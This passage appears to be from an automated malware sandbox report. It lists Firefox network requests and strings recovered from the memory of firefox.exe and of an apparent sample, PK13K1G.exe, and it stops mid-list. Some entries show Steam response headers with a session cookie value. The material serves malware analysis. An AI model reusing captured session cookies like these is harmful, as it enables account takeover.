Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 00000017.00000002.2623987087.0000013249F37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2623987087.0000013249F37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN :prefix \|\| :strippedURL AND :prefix \|\| :strippedURL \|\| X'FFFF'RestartOnLastWindowClosed.#maybeRestartBrowser - Still waiting for all windows to be closed and restartTimer to expire. (not restarting)[{incognito:null, tabId:null, types:["sub_frame"], urls:["://trends.google.com/trends/embed"], windowId:null}, ["blocking", "requestHeaders"]]UpdateService:selectUpdate - skipping update because the update's application version is not greater than the current application versionhttps://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/jsvid""://.adsafeprotected.com/tpl?""://pixel.advertising.com/firefox-etp""://.adsafeprotected.com//imp/""://.adsafeprotected.com/jload?""://.adsafeprotected.com//Serving/""://.adsafeprotected.com//imp/""://.adsafeprotected.com/.png""://track.adform.net/Serving/TrackPoint/""://pubads.g.doubleclick.net/gampad/ad-blk""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com/.gif""://.adsafeprotected.com/services/pub""://pubads.g.doubleclick.net/gampad/ad""://ads.stickyadstv.com/auto-user-sync""://vast.adsafeprotected.com/vast""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com//Serving/""://.adsafeprotected.com//adj""://securepubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/.gif""://.adsafeprotected.com//unit/""://ads.stickyadstv.com/auto-user-sync""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/.png""://.adsafeprotected.com//unit/""://www.facebook.com/platform/impression.php""://.adsafeprotected.com//adj""://.adsafeprotected.com/.js""://.adsafeprotected.com/jload""://.adsafeprotected.com/.js""://.adsafeprotected.com/tpl?""://ads.stickyadstv.com/auto-user-sync""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/jsvid""://vast.adsafeprotected.com/vast""://securepubads.g.doubleclick.net/gampad/ad""://track.adform.net/Serving/TrackPoint/""://.adsafeprotected.com/jload?""://.adsafeprotected.com/services/pub""://pubads.g.doubleclick.net/gampad/ad-blk""://pubads.g.doubleclick.net/gampad/ad""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com/.gif""://.adsafeprotected.com/.png""://cdn.cmp.advertising.com/firefox-etp""://.adsafeprotected.com/.js""://pixel.advertising.com/firefox-etp""://.adsafeprotected.com/jload""://.adsafeprotected.com/jsvid?""://www.facebook.com/platform/impression.php*" equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://www.facebook.com/platform/impression.php" equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://www.facebook.com/platform/impression.php""://securepubads.g.doubleclick.net/gampad/ad*"requireBackgroundServiceWorkerEnabled"https://ads.stickyadstv.com/firefox-etp" equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://.adsafeprotected.com//Serving/://.adsafeprotected.com/jload?--panel-banner-item-update-supported-bgcolor://pixel.advertising.com/firefox-etp://pubads.g.doubleclick.net/gampad/xml_vmap2*://.adsafeprotected.com/jsvid?://www.facebook.com/platform/impression.php://.adsafeprotected.com//imp/*executeIDB/promise</transaction.onerror equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.gstatic.com/firebasejs//firebase-messaging.js**://id.rambler.ru/rambler-id-helper/auth_events.jsCould not establish connection. Receiving end does not exist. equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2655457741.000001324EC60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2655457741.000001324ECFE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2655457741.000001324EC06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=9f8612a6551c1a78297f1c54; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35131Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 14 Dec 2024 11:56:25 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.Boolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.[{incognito:null, tabId:null, types:["main_frame"], urls:["://login.microsoftonline.com/", "://login.microsoftonline.us/"], windowId:null}, ["blocking"]]You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.Boolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.[{incognito:null, tabId:null, types:["main_frame"], urls:["://login.microsoftonline.com/", "://login.microsoftonline.us/"], windowId:null}, ["blocking"]]You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Selects which parsing/delazification strategy should be used while parsing scripts off-main-thread. See DelazificationOption in CompileOptions.h for values.Boolean used to determine if the results defined in `exposureResults` should be shown in search results. Should be false for Control branch of an experiment.[{incognito:null, tabId:null, types:["main_frame"], urls:["://login.microsoftonline.com/", "://login.microsoftonline.us/"], windowId:null}, ["blocking"]]You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: This should only be called from XPCShell testsonPrefEnabledChanged() - adding gmp directory sitepermsaddon-provider-registeredmedia.gmp-manager.cert.checkAttributesFileUtils_openSafeFileOutputStream@mozilla.org/network/safe-file-output-stream;1https://smartblock.firefox.etp/facebook.svg://cdn.branch.io/branch-latest.min.js://c.amazon-adsystem.com/aax2/apstag.js://.imgur.com/js/vendor..bundle.js://web-assets.toggl.com/app/assets/scripts/.js://libs.coremetrics.com/eluminate.jsFileUtils_openAtomicFileOutputStreamresource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter@mozilla.org.xpi://www.everestjs.net/static/st.v3.js*://static.chartbeat.com/js/chartbeat.jspictureinpicture%40mozilla.org:1.0.0://static.chartbeat.com/js/chartbeat_video.js://static.criteo.net/js/ld/publishertag.js://track.adform.net/serving/scripts/trackpoint/://pub.doubleverify.com/signals/pub.jswebcompat-reporter%40mozilla.org:1.5.1https://smartblock.firefox.etp/play.svg://auth.9c9media.ca/auth/main.js://.imgur.io/js/vendor..bundle.js@mozilla.org/network/atomic-file-output-stream;1FileUtils_closeAtomicFileOutputStreamFileUtils_closeSafeFileOutputStream://www.rva311.com/static/js/main..chunk.js://connect.facebook.net//sdk.js*://connect.facebook.net//all.js*resource://gre/modules/FileUtils.sys.mjs@mozilla.org/network/file-output-stream;1@mozilla.org/addons/addon-manager-startup;1resource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.2622599068.000001324935F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", 